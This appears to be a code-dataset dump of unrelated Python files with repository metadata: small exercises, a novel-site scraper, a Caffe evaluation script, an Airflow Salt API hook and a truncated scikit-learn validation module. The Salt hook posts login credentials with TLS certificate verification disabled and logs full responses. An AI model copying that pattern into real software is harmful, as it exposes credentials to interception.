from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
[
"[email protected]"
] | |
e13cb7e0d1b29cfbd3d7a6ae4d6a717365159901
|
08b49c36e221b9b4a68f7eba96239a5a8971cac5
|
/D02/ex05/the_only_true_pokemons.py
|
77d5446bd028cc0643376cace8a3497723a6389e
|
[] |
no_license
|
qbarrier/Python
|
1a5c6247fe3eaa126a3a8a05832affe66cdfd3d2
|
12e7852dbdcb055a5d7bf04e3ef00f66d26740ff
|
refs/heads/master
| 2020-07-07T13:36:24.361771 | 2019-08-22T06:34:19 | 2019-08-22T06:34:19 | 203,363,031 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 462 |
py
|
import requests
import json
def ft_first_gen() :
req = requests.get('https://pokeapi.co/api/v2/pokemon/?limit=150')
req = req.json()
dict_pk = {}
list_pk = []
index = 1
for x in req['results'] :
dict_pk = {index : x['name']}
list_pk.append(dict_pk)
index += 1
f = open("the_only_true_pokemons.json", "w")
f.write("%s\n" % json.dumps(list_pk))
f.close()
if __name__ == '__main__':
ft_first_gen()
|
[
"[email protected]"
] | |
25e1d7c4b496e1d13bf633c73b7f2d3e557bf8bc
|
04d3309a1618ba8bc1aac5ead238d3368b44472d
|
/18.7 Transform one string to another/main.py
|
f1cc25e5b41bd397e2fcbcd7347bbfca5febea23
|
[] |
no_license
|
cunghaw/Elements-Of-Programming
|
76ae0aabbd53f21c8472e73aa5190afdd2821826
|
3fce8c699f37913e1838fba1691f38058bfbd4c8
|
refs/heads/master
| 2021-04-09T13:54:52.006731 | 2018-05-13T02:02:30 | 2018-05-13T02:02:30 | 125,673,746 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,881 |
py
|
# -*- coding: utf-8 -*-
"""
Transform one string to another.
@author: Ronny
"""
def calcDistance( str1, str2 ):
diff = 0
for ch1, ch2 in zip( str1, str2 ):
if ch1 != ch2:
diff += 1
return diff
def getClosestNeighbors( str1, setWords ):
result = set([])
for word in setWords:
if calcDistance( str1, word ) == 1:
result.add( word )
return result
def transform( start, end, setWords ):
if start == end:
return [start]
else:
if not setWords:
return []
else:
neighbors = getClosestNeighbors( start, setWords )
if neighbors:
result = [start]
temp = {}
for neighbor in neighbors:
paths = transform( neighbor, end, setWords - neighbors - set(result) )
if len( paths ) > 0:
temp[neighbor] = paths
if temp:
min_node_len = min( [ len(v) for v in temp.values() ] )
for k,v in temp.items():
if len(v) == min_node_len:
result = result + v
return result
return []
else:
return []
if __name__ == '__main__':
assert( calcDistance( 'cat', 'cat') == 0 )
assert( calcDistance( 'cat', 'cot') == 1 )
assert( calcDistance( 'gat', 'cot') == 2 )
setWords = set( ['bat', 'cot', 'dog', 'dag', 'dot', 'cat'] )
assert( getClosestNeighbors( 'cat', setWords ) == set([ 'bat', 'cot']) )
assert( getClosestNeighbors( 'dog', setWords ) == set([ 'dag', 'dot']) )
assert( transform( 'cat', 'dog', setWords ) == ['cat', 'cot', 'dot', 'dog'] )
setWords = set( ['bat', 'cot', 'dit', 'dut', 'deg' ,'dog', 'dag', 'dot', 'cat'] )
assert( transform( 'cat', 'dog', setWords ) == ['cat', 'cot', 'dot', 'dog'] )
assert( transform( 'cat', 'dos', setWords ) == [] )
setWords = set( ['cat', 'bat', 'pat', 'pot', 'cot'] )
assert( transform( 'cat', 'cot', setWords ) == ['cat', 'cot'] )
print "All unit tests are passed"
|
[
"[email protected]"
] | |
5a2734673ebe2a3d4cd4e803f73fdb80c111d7ce
|
12541a13c92f50b5369ee7f99ed0c1e97a45f035
|
/6/6-2.py
|
53c9d629ea47a4111df785be693c801a7cecdb68
|
[
"BSD-3-Clause"
] |
permissive
|
liuhanyu200/pygame
|
6364d90914c244fa53f56a5616a9bd95b86f440c
|
38a68e779e6b0a63edb1758fca98ebbf40bb0444
|
refs/heads/master
| 2023-06-07T04:32:57.946745 | 2021-07-01T10:17:41 | 2021-07-01T10:17:41 | 375,933,464 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 391 |
py
|
# -*- coding:utf-8 -*-
favorite_numbers = {
'wangyue': 8,
'liuseng': 2,
'luoliuzhou': 9,
'liushaoqiang': 1,
'caohongsheng': 100,
'xiongmao': 6,
'xixi': 6,
}
peoples = ['liushaoqiang', 'xixi', 'wangermazi', 'liguoqiang']
for name in favorite_numbers.keys():
if name in peoples:
print("thanks " + name)
else:
print("xiacizailai " + name)
|
[
"[email protected]"
] | |
a605b6bbb3899214e99bd6aac578f9a4ba6ca0c6
|
e0b1cd64903e4e3f2b0820e68f9c4df36800e748
|
/hooks/salt_hook.py
|
32b59c15c01230df25870e4f465bfba821579f0a
|
[
"Apache-2.0"
] |
permissive
|
savvykms/airflow-salt
|
b6f61b65c6091567ee21f2981b70f27a50d3a150
|
079fff2d0cd9090da349d6d95b72dd237810bf65
|
refs/heads/master
| 2021-06-01T06:49:42.996534 | 2016-07-13T15:40:33 | 2016-07-13T15:40:33 | 63,256,845 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,712 |
py
|
# -*- coding: utf-8 -*-
from builtins import str
import logging
import pprint
import json
import requests
from airflow.hooks.base_hook import BaseHook
from airflow.exceptions import AirflowException
class SaltHook(BaseHook):
"""
Interact with Salt servers
"""
def __init__(self, salt_conn_id='salt_default'):
self.salt_conn_id = salt_conn_id
self.authToken = None
def getAuthedConnection(self):
"""
Obtains an authenticated connection
"""
conn = self.get_connection(self.salt_conn_id)
session = requests.Session()
port = 8000
if conn.port:
port = conn.port
self.baseUrl = 'https://' + conn.host + ':' + str(port) + '/'
session.headers.update({ 'Content-Type': 'application/json; charset=UTF-8' })
if not self.authToken:
self.getAuthToken(session, conn.login, conn.password)
session.headers.update({ 'X-Auth-Token': self.authToken })
return session;
def getAuthToken( self, session, username, password ):
"""
Gets auth token from the Salt API
"""
self.authToken = None
url = self.baseUrl + 'login'
data = { 'username': username, 'password': password, 'eauth': 'pam' }
request = requests.Request('POST', url)
prepped_request = session.prepare_request(request)
prepped_request.body = json.dumps(data)
prepped_request.headers.update({ 'Content-Length': len(prepped_request.body) });
response = session.send(prepped_request, stream=False, verify=False, allow_redirects=True)
resp = response.json()
if 'token' in resp.get('return', [{}])[0]:
self.authToken = resp['return'][0]['token']
else:
raise AirflowException( 'Could not authenticate properly: ' + str(response.status_code) + ' ' + response.reason )
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise AirflowException( 'Could not authenticate properly: ' + str(response.status_code) + ' ' + response.reason )
return self.authToken
def run( self, client='local', tgt=None, fun=None, fun_args=None ):
"""
Calls the API
"""
session = self.getAuthedConnection()
url = self.baseUrl
data = { 'client': client, 'tgt': tgt, 'fun': fun, 'args': fun_args }
try:
request = requests.Request('POST', url)
prepped_request = session.prepare_request(request)
prepped_request.body = json.dumps(data)
prepped_request.headers.update({ 'Content-Length': len(prepped_request.body) });
response = session.send(prepped_request, stream=False, verify=False, allow_redirects=True)
response.raise_for_status()
except requests.exceptions.HTTPError:
logging.error( 'HTTP error: ' + response.reason )
logging.info( 'DEBUG: ' + pprint.pformat( response.__dict__ ) )
return response
|
[
"[email protected]"
] | |
1134b638f80602379677b927db8cbe49ee857fde
|
2e85be29ff69c821aafd0ed054af40fbfeccea8d
|
/CrackingTheCodingInterview/TreesandGraphs/BinaryHeap.py
|
1a7a42cac1df9a4eadf7cf1ebe586c1b7f44e646
|
[] |
no_license
|
maheshbabugorantla/CodingInterview
|
6890fe5e5b4f284b9f079b9ed6d918eb446347df
|
c24d5b35a452817fa3a5bb2dcc1168ce7fe47460
|
refs/heads/master
| 2020-03-14T03:39:11.590413 | 2018-05-03T00:32:06 | 2018-05-03T00:32:06 | 131,424,522 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,887 |
py
|
class MaxHeap:
def __init__(self, dtype=None):
if dtype is None:
raise ValueError("'type' cannot be None")
if not isinstance(dtype, type):
raise TypeError("'dtype' should be of type <class 'type'>")
self._type = dtype
self._heap = [None]
self._size = 0
def getSize(self):
return self._size
def _getMaxChild(self, i):
if (i * 2 + 1) > self._size:
return i * 2
if self._heap[i*2] > self._heap[i*2 + 1]:
return i * 2
else:
return i * 2 + 1
def _percDown(self, i):
while i * 2 <= self._size:
maxChild = self._getMaxChild(i)
if self._heap[maxChild] > self._heap[i]:
temp = self._heap[i]
self._heap[i] = self._heap[maxChild]
self._heap[maxChild] = temp
i = maxChild
def delMaxKey(self):
if self._size:
maxValue = self._heap[1]
self._heap[1] = self._heap[self._size]
self._size = self._size - 1
self._heap.pop()
self._percDown(1)
return maxValue
return None
def _percUp(self, i):
while i//2 > 0:
if self._heap[i] > self._heap[i//2]:
temp = self._heap[i]
self._heap[i] = self._heap[i//2]
self._heap[i//2] = temp
i = i//2
def insert(self, key):
if not isinstance(key, self._type):
raise TypeError("'key' should be of type {}".format(self._type))
self._heap.append(key)
self._size += 1
self._percUp(self._size)
return self
# Returns the Key with Maximum Value
def getMaxKey(self):
return self._heap[1]
# Creates heap from List of keys
def createHeapFromList(self, keys=None):
assert isinstance(keys, list), "'keys' is of type {}, should be of type {}".format(type(keys), list)
# Checking if all items in 'keys' list are of type self._type
assert all(isinstance(key, self._type) for key in keys), "All items in 'keys' should be of type {}".format(self._type)
self._size = len(keys)
self._heap = [0] + keys[:]
count = self._size//2
while count > 0:
self._percDown(count)
count -= 1
class MinHeap:
def __init__(self, dtype=None):
if dtype is None:
raise ValueError("'type' cannot be None")
if not isinstance(dtype, type):
raise TypeError("'dtype' should be of type <class 'type'>")
self._type = dtype
self._heap = [None]
self._size = 0
def getSize(self):
return self._size
def insert(self, key):
if not isinstance(key, self._type):
raise TypeError("key should of be of type {}".format(self._type))
self._size += 1
self._heap.append(key)
self._percUp(self._size)
return self
def _percUp(self, i):
while i//2 > 0:
if self._heap[i] < self._heap[i//2]:
tmp = self._heap[i//2]
self._heap[i//2] = self._heap[i]
self._heap[i] = tmp
i = i//2
# Returns the key with minimum value
def getMinKey(self):
return self._heap[1]
def _percDown(self, i):
while (i * 2) <= self._size:
minChild = self._getMinChild(i)
if self._heap[minChild] < self._heap[i]:
temp = self._heap[minChild]
self._heap[minChild] = self._heap[i]
self._heap[i] = temp
i = minChild
# Returns the Index of the Min Child
def _getMinChild(self, i):
if (i * 2 + 1) > self._size:
return i * 2
else:
if self._heap[i * 2] < self._heap[i * 2 + 1]:
return i * 2
else:
return i * 2 + 1
# Deletes the Min Key and returns the minimum key
def delMinKey(self):
if self._size:
minVal = self._heap[1]
self._heap[1] = self._heap[self._size]
self._size = self._size - 1
self._heap.pop()
self._percDown(1)
return minVal
return None
# Creates a new heap from the list of keys
def createHeapFromList(self, keys=None):
assert isinstance(keys, list), "'keys' is of type {}, should be of type {}".format(type(keys), list)
# Checking if all items in 'keys' list are of type self._type
assert all(isinstance(key, self._type) for key in keys), "All items in 'keys' should be of type {}".format(self._type)
self._size = len(keys)
self._heap = [0] + keys[:]
count = self._size//2
while count > 0:
self._percDown(count)
count -= 1
|
[
"[email protected]"
] | |
0bc96e095f2069bc9811ef311b2dee119285ae92
|
9c88b828b783e23b50186a2cbba2c08610d8d10d
|
/espressodb/documentation/__init__.py
|
c16020e168c1d82085be018508a3cd3600a84a63
|
[
"BSD-3-Clause"
] |
permissive
|
remram44/espressodb
|
9a51219c0e7ec6e4c400578d02b97ef95024ba1e
|
5aad7222ab81c0f1694b51171e5d197dbcc8a65f
|
refs/heads/master
| 2020-12-08T06:07:43.736419 | 2020-01-12T20:31:20 | 2020-01-12T20:31:20 | 232,909,755 | 0 | 0 |
BSD-3-Clause
| 2020-01-09T21:29:09 | 2020-01-09T21:29:08 | null |
UTF-8
|
Python
| false | false | 170 |
py
|
"""The documentations module provides a web page which summarizes the implemented models
which derive from the EspressoDB :class:`espressodb.base.models.Base` class.
"""
|
[
"[email protected]"
] | |
5865cee0434fa771b0ffd1e3c9bcb56df6e08c4a
|
3967e42abb6f497ede6d342e8f74bd8150f9c52d
|
/src/spiders/qidiancom.py
|
b70dc6414c2c1f6637e2011d657997aa17ae923f
|
[
"Apache-2.0"
] |
permissive
|
varunprashar5/lightnovel-crawler
|
4886862115c5c3e15a9137e698e14253e14b7423
|
4ca387f3c8f17771befad1d48d417bbc7b9f8bfd
|
refs/heads/master
| 2020-12-01T22:27:33.699798 | 2019-12-29T05:25:09 | 2019-12-29T05:25:09 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,465 |
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
from ..utils.crawler import Crawler
logger = logging.getLogger('QIDIAN_COM')
chapter_list_url = 'https://book.qidian.com/ajax/book/category?_csrfToken=%s&bookId=%s'
chapter_details_url = 'https://read.qidian.com/chapter/%s'
class QidianComCrawler(Crawler):
def initialize(self):
self.home_url = 'https://www.qidian.com/'
# end def
def read_novel_info(self):
'''Get novel title, autor, cover etc'''
logger.debug('Visiting %s', self.novel_url)
soup = self.get_soup(self.novel_url)
self.novel_title = soup.select_one('.book-info h1 em').text
logger.info('Novel title: %s', self.novel_title)
self.novel_author = soup.select_one('.book-info h1 a.writer').text
logger.info('Novel author: %s', self.novel_author)
book_img = soup.select_one('#bookImg')
self.novel_cover = self.absolute_url(book_img.find('img')['src'])
self.novel_cover = '/'.join(self.novel_cover.split('/')[:-1])
logger.info('Novel cover: %s', self.novel_cover)
self.book_id = book_img['data-bid']
logger.debug('Book Id: %s', self.book_id)
self.csrf = self.cookies['_csrfToken']
logger.debug('CSRF Token: %s', self.csrf)
volume_url = chapter_list_url % (self.csrf, self.book_id)
logger.debug('Visiting %s', volume_url)
data = self.get_json(volume_url)
for volume in data['data']['vs']:
vol_id = len(self.volumes) + 1
self.volumes.append({
'id': vol_id,
'title': volume['vN'],
})
for chapter in volume['cs']:
ch_id = len(self.chapters) + 1
self.chapters.append({
'id': ch_id,
'volume': vol_id,
'title': chapter['cN'],
'url': chapter_details_url % chapter['cU'],
})
# end for
# end for
# end def
def download_chapter_body(self, chapter):
'''Download body of a single chapter and return as clean html format'''
logger.info('Downloading %s', chapter['url'])
soup = self.get_soup(chapter['url'])
chapter['body_lock'] = True
chapter['title'] = soup.select_one('h3.j_chapterName').text.strip()
return soup.select_one('div.j_readContent').extract()
# end def
# end class
|
[
"[email protected]"
] | |
53a370b8267f3b4b44af65a058a1f0d3b8878e36
|
0ae564797425ff1c324904e7292b3ea1ed8f20b6
|
/pycaffe/python2.7.12/check_china_lenet_dp2.py
|
1d20db532f2dcc19c5fb29bde1c43bcd2871d512
|
[] |
no_license
|
f846019u/git
|
69c371db15e5cd2071473c6e165664980ab55b50
|
7ca8d1bc9e46ff045100315eaf3addc75ffce9e8
|
refs/heads/master
| 2020-04-06T22:40:18.734028 | 2018-11-16T09:14:32 | 2018-11-16T09:14:32 | null | 0 | 0 | null | null | null | null |
EUC-JP
|
Python
| false | false | 3,322 |
py
|
#!/usr/bin/env python
import numpy as np
import sys
import os
import caffe
import cv2 as cv
#評価する番号
VALUE_NUM = '0'
MODEL_NAME = 'china_lenet_dp2'
MODEL_FILE = '../../' + MODEL_NAME + '_deploy.prototxt'
PRETRAINED = '../../weights/' + MODEL_NAME + '/' + MODEL_NAME + '_value' + VALUE_NUM + '_iter_15000.caffemodel'
IMAGE_FILE = '/home/higaki/china_data/image_0/test/alp/A/0202_SN1_3.png'
if not os.path.isfile(MODEL_FILE):
print("error: caffe model load...")
if not os.path.isfile(PRETRAINED):
print("error: pre-trained caffe model...")
if not os.path.isfile(IMAGE_FILE):
print("error: image_file not open.")
print ' '
print MODEL_FILE
print PRETRAINED
print ' '
#テストデータのnumpyファイル作成##
#width, height, test_class定義
width = 14
height = 20
test_class = 36
#dir_listにPATHのフォルダを入れていく
PATH = '/home/higaki/china_data/image_' + VALUE_NUM + '/test/'
tmp = os.listdir(PATH)
tmp = sorted([x for x in tmp if os.path.isdir(PATH + x)])
dir_list = tmp
#print(dir_list)
X_test = []
Y_test = []
image_name = []
label = 0
# alp or num を処理
for alp_num in dir_list:
if str(alp_num) == 'num':
label = 0
if str(alp_num) == 'alp':
label = 10
tmp = os.listdir(PATH + str(alp_num) + '/')
#print tmp
tmp = sorted([x for x in tmp if os.path.isdir(PATH + '/' + str(alp_num) + '/' + x)])
#print tmp
alp_num_list = tmp
# A~Z or 0~9 を処理
for dir_name in alp_num_list :
file_list = os.listdir(PATH + str(alp_num) + '/' + str(dir_name))
#print dir_name
#print len(file_list)
# それぞれの画像を処理
for file_name in file_list:
if file_name.endswith('.png'):
#image = cv.imread(PATH + str(alp_num) + '/' + str(dir_name) + '/' + file_name, 0)
#image = cv.resize(image, (width, height))
#cv.normalize(image, image, alpha=0, beta=255, norm_type=cv.NORM_MINMAX)
#image = image / 255.
#X_test.append(image)
Y_test.append(label)
image_name.append(PATH + str(alp_num) + '/' + str(dir_name) + '/' + file_name)
label = label + 1
#'V'が中国紙幣にないのでインクリメントする。
if label == 31:
label = label + 1
#print len(Y_test)
#print len(image_name)
X_test = np.asarray(X_test)
Y_test = np.asarray(Y_test)
image_name.sort()
#print(X_test.shape)
#print(Y_test.shape)
#print(len(image_name))
## テストデータのどこが間違えているかを確認 ##
caffe.set_mode_cpu()
net = caffe.Classifier(MODEL_FILE, PRETRAINED, image_dims=(20, 14))
for (Y, name) in zip(Y_test, image_name):
if Y == 18:
Y = 1
if Y == 24:
Y = 0
input_image = caffe.io.load_image(name, color=False)
prediction = net.predict([input_image], False)
#print("prediction shape: {}".format(prediction[0].shape))
#print("predicted class: {}".format(prediction[0].argmax()) + ' ' + str(Y))
if str(Y) != format(prediction[0].argmax()):
print name + ' ' + format(prediction[0].argmax())
#print("predicted class: {}".format(prediction[0].argmax()) + ' ' + str(Y))
|
[
"[email protected]"
] | |
81d8d57b0e12ee8119dcc4e5f8a7af1fbd776d8e
|
f92a578eb638f8310e1824ebfc32d6c252f6043c
|
/game/omok/OmokClient.py
|
347993c7f964bfcdf40d795fdd42bc1e05865864
|
[
"MIT"
] |
permissive
|
HyOsori/battle.ai
|
6e847bf4594e9fd49543cbb29325d4ba0bc02e78
|
5e459fc965716cb336b3b4aa3ea02c9bfe529621
|
refs/heads/develop
| 2020-04-12T06:43:44.568719 | 2017-09-10T06:42:09 | 2017-09-10T06:42:09 | 64,668,694 | 23 | 3 | null | 2017-09-10T06:42:11 | 2016-08-01T13:20:55 |
JavaScript
|
UTF-8
|
Python
| false | false | 382 |
py
|
# -*-coding:utf-8-*-
import sys
from game.omok.MyOmokParser import MyOMOKParser
from gamebase.client.Client import Client
# HOST = '104.199.218.103'
HOST = '127.0.0.1'
PORT = 9001
client = Client()
if client.connect_server(HOST, PORT) is False:
print('서버 연결오류')
sys.exit()
player_parser = MyOMOKParser()
client.set_parser(player_parser)
client.client_run()
|
[
"[email protected]"
] | |
f636068a81116528616e1f63c07c412447c94e49
|
c5be6a92f216957d340474b58507606a38c10f5f
|
/course-files/tutorials/tutorial04/answers/drawings/d5.py
|
e0e46a2f538962b9b15a80780794e0fa647bfa31
|
[] |
no_license
|
eecs110/winter2019
|
0b314c35e886b8099368ed7dfd51b707ab73c0c2
|
f4107207ca1c9c10b78bdbb74fd82410b00ee363
|
refs/heads/master
| 2020-04-11T10:09:28.100445 | 2019-03-21T18:00:25 | 2019-03-21T18:00:25 | 161,705,160 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 860 |
py
|
from tkinter import Canvas, Tk
import random
import shapes
import math
gui = Tk()
gui.title('Circle')
canvas = Canvas(gui, width=500, height=500, background='#FFFFFF')
canvas.pack()
########################## YOUR CODE BELOW THIS LINE ##############################
center_x = 250
center_y = 250
distance_from_center = 50
radius_of_individual_circle = 100
num_circles = 30
for i in range(num_circles):
# calculate new position of x and y
radians = 360 / num_circles * i * (math.pi / 180)
dy = distance_from_center * math.sin(radians)
dx = distance_from_center * math.cos(radians)
x = center_x + dx
y = center_y - dy
shapes.make_circle(canvas, (x, y), radius_of_individual_circle, color=None, outline='black', stroke_width=1)
########################## YOUR CODE ABOVE THIS LINE ##############################
canvas.mainloop()
|
[
"[email protected]"
] | |
b41096d3e1efdc61b647a58e277d2f249fd7989c
|
3a957b12c171cb81f2a0458d5c5b186679535dad
|
/sklearn/utils/_param_validation.py
|
4370817094be87a9f7f5ff2ce45aaf23fe527990
|
[
"BSD-3-Clause"
] |
permissive
|
jeremiedbb/scikit-learn
|
d6e72dc13c44e2e5e2060d74d71cd300c53f3240
|
c3bfe86b45577a9405a4680d9971efa9594a0657
|
refs/heads/master
| 2023-07-09T19:03:28.306963 | 2023-03-30T17:30:41 | 2023-03-30T17:30:41 | 135,716,742 | 3 | 0 |
BSD-3-Clause
| 2023-03-16T21:18:33 | 2018-06-01T12:46:27 |
Python
|
UTF-8
|
Python
| false | false | 27,087 |
py
|
from abc import ABC
from abc import abstractmethod
from collections.abc import Iterable
import functools
import math
from inspect import signature
from numbers import Integral
from numbers import Real
import operator
import re
import warnings
import numpy as np
from scipy.sparse import issparse
from scipy.sparse import csr_matrix
from .validation import _is_arraylike_not_scalar
class InvalidParameterError(ValueError, TypeError):
"""Custom exception to be raised when the parameter of a class/method/function
does not have a valid type or value.
"""
# Inherits from ValueError and TypeError to keep backward compatibility.
def validate_parameter_constraints(parameter_constraints, params, caller_name):
"""Validate types and values of given parameters.
Parameters
----------
parameter_constraints : dict or {"no_validation"}
If "no_validation", validation is skipped for this parameter.
If a dict, it must be a dictionary `param_name: list of constraints`.
A parameter is valid if it satisfies one of the constraints from the list.
Constraints can be:
- an Interval object, representing a continuous or discrete range of numbers
- the string "array-like"
- the string "sparse matrix"
- the string "random_state"
- callable
- None, meaning that None is a valid value for the parameter
- any type, meaning that any instance of this type is valid
- an Options object, representing a set of elements of a given type
- a StrOptions object, representing a set of strings
- the string "boolean"
- the string "verbose"
- the string "cv_object"
- the string "missing_values"
- a HasMethods object, representing method(s) an object must have
- a Hidden object, representing a constraint not meant to be exposed to the user
params : dict
A dictionary `param_name: param_value`. The parameters to validate against the
constraints.
caller_name : str
The name of the estimator or function or method that called this function.
"""
for param_name, param_val in params.items():
# We allow parameters to not have a constraint so that third party estimators
# can inherit from sklearn estimators without having to necessarily use the
# validation tools.
if param_name not in parameter_constraints:
continue
constraints = parameter_constraints[param_name]
if constraints == "no_validation":
continue
constraints = [make_constraint(constraint) for constraint in constraints]
for constraint in constraints:
if constraint.is_satisfied_by(param_val):
# this constraint is satisfied, no need to check further.
break
else:
# No constraint is satisfied, raise with an informative message.
# Ignore constraints that we don't want to expose in the error message,
# i.e. options that are for internal purpose or not officially supported.
constraints = [
constraint for constraint in constraints if not constraint.hidden
]
if len(constraints) == 1:
constraints_str = f"{constraints[0]}"
else:
constraints_str = (
f"{', '.join([str(c) for c in constraints[:-1]])} or"
f" {constraints[-1]}"
)
raise InvalidParameterError(
f"The {param_name!r} parameter of {caller_name} must be"
f" {constraints_str}. Got {param_val!r} instead."
)
def make_constraint(constraint):
"""Convert the constraint into the appropriate Constraint object.
Parameters
----------
constraint : object
The constraint to convert.
Returns
-------
constraint : instance of _Constraint
The converted constraint.
"""
if isinstance(constraint, str) and constraint == "array-like":
return _ArrayLikes()
if isinstance(constraint, str) and constraint == "sparse matrix":
return _SparseMatrices()
if isinstance(constraint, str) and constraint == "random_state":
return _RandomStates()
if constraint is callable:
return _Callables()
if constraint is None:
return _NoneConstraint()
if isinstance(constraint, type):
return _InstancesOf(constraint)
if isinstance(constraint, (Interval, StrOptions, Options, HasMethods)):
return constraint
if isinstance(constraint, str) and constraint == "boolean":
return _Booleans()
if isinstance(constraint, str) and constraint == "verbose":
return _VerboseHelper()
if isinstance(constraint, str) and constraint == "missing_values":
return _MissingValues()
if isinstance(constraint, str) and constraint == "cv_object":
return _CVObjects()
if isinstance(constraint, Hidden):
constraint = make_constraint(constraint.constraint)
constraint.hidden = True
return constraint
raise ValueError(f"Unknown constraint type: {constraint}")
def validate_params(parameter_constraints):
"""Decorator to validate types and values of functions and methods.
Parameters
----------
parameter_constraints : dict
A dictionary `param_name: list of constraints`. See the docstring of
`validate_parameter_constraints` for a description of the accepted constraints.
Note that the *args and **kwargs parameters are not validated and must not be
present in the parameter_constraints dictionary.
Returns
-------
decorated_function : function or method
The decorated function.
"""
def decorator(func):
# The dict of parameter constraints is set as an attribute of the function
# to make it possible to dynamically introspect the constraints for
# automatic testing.
setattr(func, "_skl_parameter_constraints", parameter_constraints)
@functools.wraps(func)
def wrapper(*args, **kwargs):
func_sig = signature(func)
# Map *args/**kwargs to the function signature
params = func_sig.bind(*args, **kwargs)
params.apply_defaults()
# ignore self/cls and positional/keyword markers
to_ignore = [
p.name
for p in func_sig.parameters.values()
if p.kind in (p.VAR_POSITIONAL, p.VAR_KEYWORD)
]
to_ignore += ["self", "cls"]
params = {k: v for k, v in params.arguments.items() if k not in to_ignore}
validate_parameter_constraints(
parameter_constraints, params, caller_name=func.__qualname__
)
try:
return func(*args, **kwargs)
except InvalidParameterError as e:
# When the function is just a wrapper around an estimator, we allow
# the function to delegate validation to the estimator, but we replace
# the name of the estimator by the name of the function in the error
# message to avoid confusion.
msg = re.sub(
r"parameter of \w+ must be",
f"parameter of {func.__qualname__} must be",
str(e),
)
raise InvalidParameterError(msg) from e
return wrapper
return decorator
class RealNotInt(Real):
"""A type that represents reals that are not instances of int.
Behaves like float, but also works with values extracted from numpy arrays.
isintance(1, RealNotInt) -> False
isinstance(1.0, RealNotInt) -> True
"""
RealNotInt.register(float)
def _type_name(t):
"""Convert type into human readable string."""
module = t.__module__
qualname = t.__qualname__
if module == "builtins":
return qualname
elif t == Real:
return "float"
elif t == Integral:
return "int"
return f"{module}.{qualname}"
class _Constraint(ABC):
"""Base class for the constraint objects."""
def __init__(self):
self.hidden = False
@abstractmethod
def is_satisfied_by(self, val):
"""Whether or not a value satisfies the constraint.
Parameters
----------
val : object
The value to check.
Returns
-------
is_satisfied : bool
Whether or not the constraint is satisfied by this value.
"""
@abstractmethod
def __str__(self):
"""A human readable representational string of the constraint."""
class _InstancesOf(_Constraint):
"""Constraint representing instances of a given type.
Parameters
----------
type : type
The valid type.
"""
def __init__(self, type):
super().__init__()
self.type = type
def is_satisfied_by(self, val):
return isinstance(val, self.type)
def __str__(self):
return f"an instance of {_type_name(self.type)!r}"
class _NoneConstraint(_Constraint):
"""Constraint representing the None singleton."""
def is_satisfied_by(self, val):
return val is None
def __str__(self):
return "None"
class _NanConstraint(_Constraint):
"""Constraint representing the indicator `np.nan`."""
def is_satisfied_by(self, val):
return isinstance(val, Real) and math.isnan(val)
def __str__(self):
return "numpy.nan"
class _PandasNAConstraint(_Constraint):
"""Constraint representing the indicator `pd.NA`."""
def is_satisfied_by(self, val):
try:
import pandas as pd
return isinstance(val, type(pd.NA)) and pd.isna(val)
except ImportError:
return False
def __str__(self):
return "pandas.NA"
class Options(_Constraint):
"""Constraint representing a finite set of instances of a given type.
Parameters
----------
type : type
options : set
The set of valid scalars.
deprecated : set or None, default=None
A subset of the `options` to mark as deprecated in the string
representation of the constraint.
"""
def __init__(self, type, options, *, deprecated=None):
super().__init__()
self.type = type
self.options = options
self.deprecated = deprecated or set()
if self.deprecated - self.options:
raise ValueError("The deprecated options must be a subset of the options.")
def is_satisfied_by(self, val):
return isinstance(val, self.type) and val in self.options
def _mark_if_deprecated(self, option):
"""Add a deprecated mark to an option if needed."""
option_str = f"{option!r}"
if option in self.deprecated:
option_str = f"{option_str} (deprecated)"
return option_str
def __str__(self):
options_str = (
f"{', '.join([self._mark_if_deprecated(o) for o in self.options])}"
)
return f"a {_type_name(self.type)} among {{{options_str}}}"
class StrOptions(Options):
"""Constraint representing a finite set of strings.
Parameters
----------
options : set of str
The set of valid strings.
deprecated : set of str or None, default=None
A subset of the `options` to mark as deprecated in the string
representation of the constraint.
"""
def __init__(self, options, *, deprecated=None):
super().__init__(type=str, options=options, deprecated=deprecated)
class Interval(_Constraint):
"""Constraint representing a typed interval.
Parameters
----------
type : {numbers.Integral, numbers.Real, RealNotInt}
The set of numbers in which to set the interval.
If RealNotInt, only reals that don't have the integer type
are allowed. For example 1.0 is allowed but 1 is not.
left : float or int or None
The left bound of the interval. None means left bound is -∞.
right : float, int or None
The right bound of the interval. None means right bound is +∞.
closed : {"left", "right", "both", "neither"}
Whether the interval is open or closed. Possible choices are:
- `"left"`: the interval is closed on the left and open on the right.
It is equivalent to the interval `[ left, right )`.
- `"right"`: the interval is closed on the right and open on the left.
It is equivalent to the interval `( left, right ]`.
- `"both"`: the interval is closed.
It is equivalent to the interval `[ left, right ]`.
- `"neither"`: the interval is open.
It is equivalent to the interval `( left, right )`.
Notes
-----
Setting a bound to `None` and setting the interval closed is valid. For instance,
strictly speaking, `Interval(Real, 0, None, closed="both")` corresponds to
`[0, +∞) U {+∞}`.
"""
def __init__(self, type, left, right, *, closed):
super().__init__()
self.type = type
self.left = left
self.right = right
self.closed = closed
self._check_params()
def _check_params(self):
if self.type not in (Integral, Real, RealNotInt):
raise ValueError(
"type must be either numbers.Integral, numbers.Real or RealNotInt."
f" Got {self.type} instead."
)
if self.closed not in ("left", "right", "both", "neither"):
raise ValueError(
"closed must be either 'left', 'right', 'both' or 'neither'. "
f"Got {self.closed} instead."
)
if self.type is Integral:
suffix = "for an interval over the integers."
if self.left is not None and not isinstance(self.left, Integral):
raise TypeError(f"Expecting left to be an int {suffix}")
if self.right is not None and not isinstance(self.right, Integral):
raise TypeError(f"Expecting right to be an int {suffix}")
if self.left is None and self.closed in ("left", "both"):
raise ValueError(
f"left can't be None when closed == {self.closed} {suffix}"
)
if self.right is None and self.closed in ("right", "both"):
raise ValueError(
f"right can't be None when closed == {self.closed} {suffix}"
)
else:
if self.left is not None and not isinstance(self.left, Real):
